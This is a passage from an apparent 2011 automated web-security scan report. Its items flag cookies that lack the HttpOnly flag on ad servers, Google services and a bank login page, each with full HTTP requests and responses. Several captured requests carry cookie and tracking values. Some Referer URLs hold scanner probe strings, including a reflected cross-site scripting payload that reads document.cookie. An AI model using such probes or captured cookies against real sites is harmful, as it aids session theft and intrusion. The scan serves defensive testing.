Cookie: pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; uid=uid=b167d032-2d75-11e0-89fa-003048d6d890&_hmacv=1&_salt=2074615246&_keyid=k1&_hmac=249585fedc0ca1193988128dced0dced5912c7fb; pv1="b!!!!3!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#1y'!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@<l_ss~!#X@7!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@9!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@<!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@>!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#dT5!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT7!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT9!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT<!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#`,W!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,Z!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,]!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,_!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#3yC!!!%G!#4*B!/cr5!%:4s!!!%%!?5%!'k4o6!wVd.!$,gR!$a0[!'>es~~~~~<kI5G<o[wQ~!!x>#!!!/`!$C*N!.E9F!%7Dl!!!!$!?5%!%5XA1!w1K*!%oT=!!MLR!':'O~~~~~<lEIO<t:,n!!.vL"; ih="b!!!!?!(4vA!!!!#<kc#t!(mhO!!!!$<lEKI!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/Wc!!!!#<jbN?!+:d(!!!!#<htX7!+:d=!!!!$<hu%0!+kS,!!!!#<jbO@!->h]!!!!#<htSD!-g#y!!!!#<k:[]!.E9F!!!!$<lEIO!.N)i!!!!#<htgq!.T97!!!!#<k:^)!.`.U!!!!'<kc#o!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/H]-!!!!'<hu!d!/JXx!!!!$<lEWe!/J`3!!!!#<jbND!/c)/!!!!#<h67=!/cr5!!!!#<kI5G!/o:O!!!!#<htU#!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF!08r)!!!!$<lEWx!0>0V!!!!#<l/M.!0>0W!!!!#<lEK0"; vuday1=_UO8P5_x-h!>[UWm5D)f; bh="b!!!#u!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!,D(!!!!#<kI5F!!-?2!!!!'<kI5F!!-G2!!!!#<lEa6!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!%<kI5F!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!#<k2yw!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!$<kI5F!!4<u!!!!%<kI5F!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!ErC<k0fB!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L_w!!!!'<kdT!!!Mr(!!ErC<k0fB!!OgU!!!!$<kI5F!!Zwb!!!!#<kI5F!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!iEC!!!!#<kI5F!!iEb!!!!%<kI5F!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!v:e!!!!$<kI5F!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#+]S!!!!$<kI5F!#-B#!!!!#<l.yn!#-vv!!!!$<iC/K!#.dO!!!!'<kdT!!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#1=E!!!!#<kI4S!#2`q!!!!#<jc#g!#2mR!!!!$<lEIO!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!'<kI5F!#8:i!!!!#<jc#c!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#I=D!!!!#<kjhR!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!(<lEIR!#MTF!!!!(<lEIR!#MTH!!!!(<lEIR!#MTI!!!!(<lEIR!#MTJ!!!!(<lEIR!#OC2!!!!#<l/M+!#P<=!!!!#<kQRW!#PrV!!!!#<kQRW!#Q+o!!!!'<kdT!!#Qh8!!!!#<l.yn!#Ri/!!!!'<kdT!!#Rij!!!!'<kdT!!#SCj!!!!$<kcU!!#SCk!!!!$<kdT!!#SUp!!!!$<kI5F!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#TnE!!!!$<lEIR!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#UDQ!!!!(<lEIR!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#X]+!!!!'<kdT!!#ZPo!!!!#<ie2`!#ZhT!!!!'<kI5F!#Zmf!!!!$<kT`F!#[L>!!!!#<lEa3!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#^0$!!!!$<kI5F!#^0%!!!!$<kI5F!#_0t!!!!%<kTb(!#`SX!!!!#<gj@R!#aCq!!!!#<lEa2!#aG>!!!!'<kdT!!#aM'!!!!#<kp_p!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b=K!!!!#<l.yn!#b?A!!!!#<l.x@!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#e@W!!!!#<k_2)!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!%<kI5F!#fBk!!!!%<kI5F!#fBm!!!!%<kI5F!#fBn!!!!%<kI5F!#fBu!!!!#<gj@R!#fG+!!!!%<kI5F!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g'E!!!!#<gj@R!#g/7!!!!$<kI5F!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#h.N!!!!#<kL2n!#jS>!!!!#<k_Jy!#mP5!!!!#<lEa6!#mP6!!!!#<lEa6!#ndJ!!!!#<k2yx!#ndP!!!!#<k2yx!#nda!!!!#<k2yx!#ne$!!!!#<k2yx!#p]T!!!!$<kL2n"

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 21:59:54 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: bh="b!!!#v!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!,D(!!!!#<kI5F!!-?2!!!!'<kI5F!!-G2!!!!#<lEa6!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!%<kI5F!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!#<k2yw!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!$<kI5F!!4<u!!!!%<kI5F!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!ErC<k0fB!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L_w!!!!'<kdT!!!Mr(!!ErC<k0fB!!OgU!!!!$<kI5F!!Zwb!!!!#<kI5F!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!iEC!!!!#<kI5F!!iEb!!!!%<kI5F!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!v:e!!!!$<kI5F!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#+]S!!!!$<kI5F!#-B#!!!!#<l.yn!#-vv!!!!$<iC/K!#.dO!!!!'<kdT!!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#1=E!!!!#<kI4S!#2`q!!!!#<jc#g!#2mR!!!!$<lEIO!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!'<kI5F!#8:i!!!!#<jc#c!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#I=D!!!!#<kjhR!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!(<lEIR!#MTF!!!!(<lEIR!#MTH!!!!(<lEIR!#MTI!!!!(<lEIR!#MTJ!!!!(<lEIR!#OC2!!!!#<l/M+!#P<=!!!!#<kQRW!#PrV!!!!#<kQRW!#Q+o!!!!'<kdT!!#Qh8!!!!#<l.yn!#Ri/!!!!'<kdT!!#Rij!!!!'<kdT!!#SCj!!!!$<kcU!!#SCk!!!!$<kdT!!#SUp!!!!$<kI5F!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#TnE!!!!$<lEIR!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#UDQ!!!!(<lEIR!#UL(!!!!#<lHkj!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#X]+!!!!'<kdT!!#ZPo!!!!#<ie2`!#ZhT!!!!'<kI5F!#Zmf!!!!$<kT`F!#[L>!!!!#<lEa3!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#^0$!!!!$<kI5F!#^0%!!!!$<kI5F!#_0t!!!!%<kTb(!#`SX!!!!#<gj@R!#aCq!!!!#<lEa2!#aG>!!!!'<kdT!!#aM'!!!!#<kp_p!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b=K!!!!#<l.yn!#b?A!!!!#<l.x@!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#e@W!!!!#<k_2)!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!%<kI5F!#fBk!!!!%<kI5F!#fBm!!!!%<kI5F!#fBn!!!!%<kI5F!#fBu!!!!#<gj@R!#fG+!!!!%<kI5F!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g'E!!!!#<gj@R!#g/7!!!!$<kI5F!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#h.N!!!!#<kL2n!#jS>!!!!#<k_Jy!#mP5!!!!#<lEa6!#mP6!!!!#<lEa6!#ndJ!!!!#<k2yx!#ndP!!!!#<k2yx!#nda!!!!#<k2yx!#ne$!!!!#<k2yx!#p]T!!!!$<kL2n"; path=/; expires=Fri, 01-Feb-2013 21:59:54 GMT
Cache-Control: no-store
Last-Modified: Wed, 02 Feb 2011 21:59:54 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

11.207. http://ads.adbrite.com/adserver/vdi/762701  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/762701

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adserver/vdi/762701?d=D8DB51BF08484217F5D14AB47F4002AD HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.arbornetworks.com/report
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=168362173x0.688+1294536261x899753879; cv=1%3Aq1ZyLi0uyc91zUtWslIySyktr0nPLLDMMi8zrjGwMswuNjMusjK0MlCqBQA%3D; ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z9dJzsiwSC%2BoysmrMczJSS%2BqqjGsMYAJZuUgCSrpKCUl5uWlFmWCjVKqrQUA; rb="0:712156:20822400:6ch47d7o8wtv:0:742697:20828160:3011330574290390485:0:753292:20858400:CA-00000000456885722:0:762701:20861280:D8DB51BF08484217F5D14AB47F4002AD:0:806205:20861280:21d8e954-2b06-11e0-8e8a-0025900870d2:0"; srh=1%3Aq64FAA%3D%3D; vsd="0@a@4d49757a@www.ehow.com"

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Wed, 02 Feb 2011 23:36:07 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: Apache-Coyote/1.1
Set-Cookie: vsd="0@1@4d49ea68@www.arbornetworks.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/
Content-Length: 42

GIF89a.............!.......,........@..D.;

11.208. https://adwords.google.com/select/Login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /select/Login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /select/Login?sourceid=awo&subid=us-en-et-symh&medium=link&hl=en HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: AdsUserLocale=en_US; Expires=Sat, 05-Mar-2011 00:08:04 GMT; Path=/; Secure
Set-Cookie: adwordsReferralSource=sourceid=awo&subid=us-en-et-symh&clickid=; Expires=Wed, 04-May-2011 00:08:04 GMT; Path=/; Secure; HttpOnly
Set-Cookie: I=hFz06C0BAAA=.9QCH/JbBItRG1yn60m2UCA==./aPBhkvzsSC9YPAgX63wDQ==; Path=/select; Secure; HttpOnly
Set-Cookie: S=awfe=JYRj0mhHP4PryaPoNpSQ6w:awfe-efe=JYRj0mhHP4PryaPoNpSQ6w; Domain=.google.com; Path=/; Secure; HttpOnly
Set-Cookie: S_awfe=VdX57Ap2k6RGWpCZWbssmw; Domain=.google.com; Path=/; Secure; HttpOnly
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Location: /um/StartNewLogin?sourceid=awo&subid=us-en-et-symh&medium=link&hl=en
Date: Thu, 03 Feb 2011 00:08:04 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="/um/StartNewLogin?sourceid=awo&amp;subid=us-en
...[SNIP]...

11.209. http://affiliate.invisionpower.com/scripts/track.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://affiliate.invisionpower.com
Path:   /scripts/track.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/track.php?visitorId=7432e15fddd3a34a2d79b00lmU2qECVV&tracking=F&url=H_www.invisionpower.com%2F%2Fproducts%2Fboard%2Ffeatures%2F&referrer=H_burp%2Fshow%2F38&getParams=%3F95e51--%253E%253Ca%253E1fddadebe75%3D1&anchor=&cookies= HTTP/1.1
Host: affiliate.invisionpower.com
Proxy-Connection: keep-alive
Referer: http://www.invisionpower.com/products/board/features/?95e51--%3E%3Ca%3E1fddadebe75=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61175156.1296696677.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/38; __utma=61175156.1901611536.1296685558.1296685558.1296696677.2; __utmc=61175156; __utmb=61175156.1.10.1296696677

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:30:40 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
P3P: CP="NOI NID ADMa DEVa PSAa OUR BUS ONL UNI COM STA OTC"
Set-Cookie: PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; expires=Sun, 31-Jan-2021 01:30:40 GMT; path=/; domain=.invisionpower.com
Content-Length: 0
Content-Type: application/x-javascript


11.210. http://api.viglink.com/api/ping  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.viglink.com
Path:   /api/ping

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /api/ping?format=jsonp&key=4f085ab2452b05f4c24c6b37dbc58a3b&loc=http%3A%2F%2Fcommunity.invisionpower.com%2F&subId=d59e71895dde9e0dbe7525217bd974&v=1&jsonp=vglnk_jsonp_12966855687740 HTTP/1.1
Host: api.viglink.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Language: en-US
Content-Type: text/javascript;charset=ISO-8859-1
Date: Wed, 02 Feb 2011 22:25:07 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Set-Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c; Domain=.viglink.com; Expires=Sat, 30-Jan-2021 22:25:07 GMT; Path=/
Content-Length: 101
Connection: keep-alive


vl_ping(1296685507564,2000,[],[],{"plugins":{},"timeClick":true,"debug":false,"timePing":false},[]);

11.211. http://blogsearch.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogsearch.google.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: blogsearch.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:08:17 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=a1826614eefe1f7c:TM=1296691697:LM=1296691697:S=Fm_U8o3fOwGHFaA9; expires=Sat, 02-Feb-2013 00:08:17 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: bsfe
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta HTTP-EQUIV="content-type" content="text/html; charset=UTF-8"><meta description="Google Blog Search provides fresh, relevant search results from millions of feed-enabled blogs. Users
...[SNIP]...

11.212. http://books.google.com/bkshp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://books.google.com
Path:   /bkshp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bkshp HTTP/1.1
Host: books.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:08:19 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=109a9aeaece08aed:TM=1296691699:LM=1296691699:S=sEECQby9jva9KsA1; expires=Sat, 02-Feb-2013 00:08:19 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: OFE/0.1
Connection: close

<!DOCTYPE html><html><head><script>(function(){function a(d){this.t={};this.tick=function(e,f,b){b=b?b:(new Date).getTime();this.t[e]=[b,f]};this.tick("start",null,d)}var c=new a;window.jstiming={Time
...[SNIP]...

11.213. http://books.google.com/books  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://books.google.com
Path:   /books

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /books HTTP/1.1
Host: books.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:08:18 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=75899bb590a713b6:TM=1296691698:LM=1296691698:S=LGIgDlcm48-CMNO0; expires=Sat, 02-Feb-2013 00:08:18 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: OFE/0.1
Connection: close

<!DOCTYPE html><html><head><script>(function(){function a(d){this.t={};this.tick=function(e,f,b){b=b?b:(new Date).getTime();this.t[e]=[b,f]};this.tick("start",null,d)}var c=new a;window.jstiming={Time
...[SNIP]...

11.214. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2171139&PluID=0&w=728&h=90&ord=[timestamp]&ucm=true HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001gy3.ach00c9M00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ852G0000000003sS7dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.83xP0000000001sF8cVQ0000000001sV852N0000000001s.87ma0000000001s.6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=0; ActivityInfo=000p81bBo%5f; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Tue, 03-May-2011 20:25:38 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=h5j3abNz07l00000.h5iUabNz07l00000Qf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001gYx+adw90cvM00001fUFGa50V02WG00001gy3.ach00c9M00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001; expires=Tue, 03-May-2011 20:25:38 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=89PS000000000QsZ7lgH0000000001sG89PT000000000.sZ852G0000000003sS7dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.8cVQ0000000001sV83xP0000000001sF852N0000000001s.6o.Q0000000001sY87ma0000000001s.8i430000000001t27gi30000000001sG852z0000000001sS852A0000000001sS; expires=Tue, 03-May-2011 20:25:38 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Tue, 03-May-2011 20:25:38 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 03 Feb 2011 01:25:38 GMT
Connection: close
Content-Length: 1696

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

11.215. https://chaseonline.chase.com/auth/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://chaseonline.chase.com
Path:   /auth/login.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /auth/login.aspx HTTP/1.1
Host: chaseonline.chase.com
Accept: */*
Accept-Language: en
